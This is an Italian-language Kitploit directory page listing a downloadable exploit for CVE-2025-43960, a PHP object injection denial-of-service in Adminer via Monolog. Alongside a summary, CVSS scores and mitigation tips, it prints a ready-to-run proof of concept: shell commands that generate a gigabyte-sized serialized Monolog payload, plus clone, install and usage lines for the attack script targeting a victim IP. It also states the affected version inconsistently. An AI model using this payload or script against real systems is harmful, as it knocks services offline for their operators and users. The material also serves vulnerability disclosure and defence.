Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-43960 — Exploit di Object Injection PHP per Adminer <4.8.1 tramite Monolog, che causa Denial of Service attraverso payload serializzati appositamente creati. Include PoC, punteggio CVSS e indicazioni di mitigazione. | Kitploit
Strumenti/GitHubGitHub/far00t01/cve-2025-43960
Generazione di PayloadAnalisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni Web
GitHubfar00t01/cve-2025-43960

CVE-2025-43960

Exploit di Object Injection PHP per Adminer <4.8.1 tramite Monolog, che causa Denial of Service attraverso payload serializzati appositamente creati. Include PoC, punteggio CVSS e indicazioni di mitigazione.

Vedi Repository
131 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-43960 - Iniezione di Oggetti PHP in Adminer < 4.8.1 tramite Monolog - Negazione del Servizio (DoS)

Dopo mesi di attesa per una risposta da MITRE, ho ottenuto CVE-2025-43960 con un attacco di Iniezione di Oggetti PHP contro il servizio Adminer (<4.8.1), causando una Negazione del Servizio (DoS) tramite Manipolazione della Memoria.

https://github.com/user-attachments/assets/ebf7d8e8-01db-4d02-bb12-33321c749458

Riepilogo

Questa vulnerabilità consente a aggressori remoti non autenticati di sfruttare le istanze di Adminer 4.8.1 che utilizzano Monolog, causando una Negazione del Servizio (DoS) tramite Iniezione di Oggetti PHP. Il vettore di attacco non richiede autenticazione né interazione da parte dell'utente, rendendolo un problema di elevata gravità (CVSS 7.5) con potenziale di escalation a 8.6 in determinati ambienti condivisi.

Descrizione suggerita

Adminer 4.8.1, quando utilizza Monolog per il logging, permette una negazione del servizio (consumo di memoria) tramite un payload serializzato appositamente creato, come una stringa s:1000000000, noto come problema di Iniezione di Oggetti PHP. La vulnerabilità colpisce le istanze di Adminer che utilizzano Monolog per il logging, dove l'input utente non affidabile viene deserializzato senza una corretta validazione. Inviando un grande oggetto deserializzato, un aggressore può forzare un elevato consumo di memoria, rendendo l'interfaccia di Adminer non reattiva e causando un DoS a livello di server.

  • Mentre il server potrebbe riprendersi dopo diversi minuti, richieste multiple concorrenti possono causare un crash completo, richiedendo un intervento manuale per ripristinare il servizio.

Punteggio CVSS v3.1

Punteggio Base: 7.5 (Alto)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Nota su distribuzioni specifiche:

Se l'arresto di Adminer interrompe anche altri servizi/tenant (es. container o processo condiviso), Scope: Changed potrebbe applicarsi:

  • Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
  • Score: 8.6 (Alto)

Informazioni Aggiuntive

Potenziali Misure di Mitigazione

  • Evitare l'uso di unserialize() su dati non affidabili in Adminer e Monolog.
  • Imporre limiti di memoria (memory_limit) in PHP per prevenire un consumo eccessivo di risorse.
  • Utilizzare allowed_classes in unserialize() per limitare la deserializzazione di classi non autorizzate.

Vendor del Prodotto

  • Adminer

Code Base del Prodotto Affetto

  • Adminer < 4.8.1 (ultima versione stabile al momento del test)

Componente Affetto

  • Integrazione di Monolog in Adminer

Funzionalità Problematica

  • Iniezione di Oggetti PHP tramite unserialize()

Area Potenzialmente Colpita

  • Qualsiasi istanza di Adminer in cui viene utilizzato il logging basato su Monolog

Prova di Concetto (PoC)

Generazione del payload:

root@kitploit:~
head -c 1000000000 </dev/zero | tr '\0' 'D' > filler.txt
root@kitploit:~
echo 'O:32:"Monolog\\Handler\\SyslogUdpHandler":2:{
   s:9:"*socket";r:2;
   s:10:"*handler";s:1000000000:"'$(cat filler.txt)'";
 }' > payload.txt

Impatto:

  • Il server entra in uno stato di caricamento, rendendo Adminer inaccessibile.
  • Il frontend scompare completamente mentre la connessione è attiva.
  • Quando l'attacco si ferma, il server si riprende dopo alcuni minuti a meno che non vengano utilizzate più macchine (scenario DDoS).

Requisiti di Installazione

  • Python: Assicurati di avere Python 3.x installato. Puoi verificarlo eseguendo python3 --version nel tuo terminale.

Dipendenze Python

  • Flask: Utilizzato per eseguire il server HTTP locale che serve il payload.
  • requests: Utilizzato per interagire con l'applicazione target durante il processo di exploit.

Installazione

root@kitploit:~
git clone https://github.com/far00t01/CVE-2025-43960
cd CVE-2025-43960 
pip install -r requirement.txt
python3 cve-2025-43960.py

Utilizzo Exploit:

root@kitploit:~
python3 cve-2025-43960.py 

Usage: cve-2025-43960.py <ip-listener> <port-listener> <ip-victim:port>
Example: python3 cve-2025-43960.py 198.51.100.11 80 203.0.113.11:8000

Riferimenti

  • https://www.adminer.org
  • https://github.com/vrana/adminer
  • https://github.com/Seldaek/monolog
  • https://www.cvedetails.com/product/44183/Adminer-Adminer.html?vendor_id=17755
  • https://cwe.mitre.org/data/definitions/502.html
  • https://cwe.mitre.org/data/definitions/400.html
  • https://cwe.mitre.org/data/definitions/789.html

Scopritore

Fabian Rosales (@far00t01) Medium.

Scarica lo strumento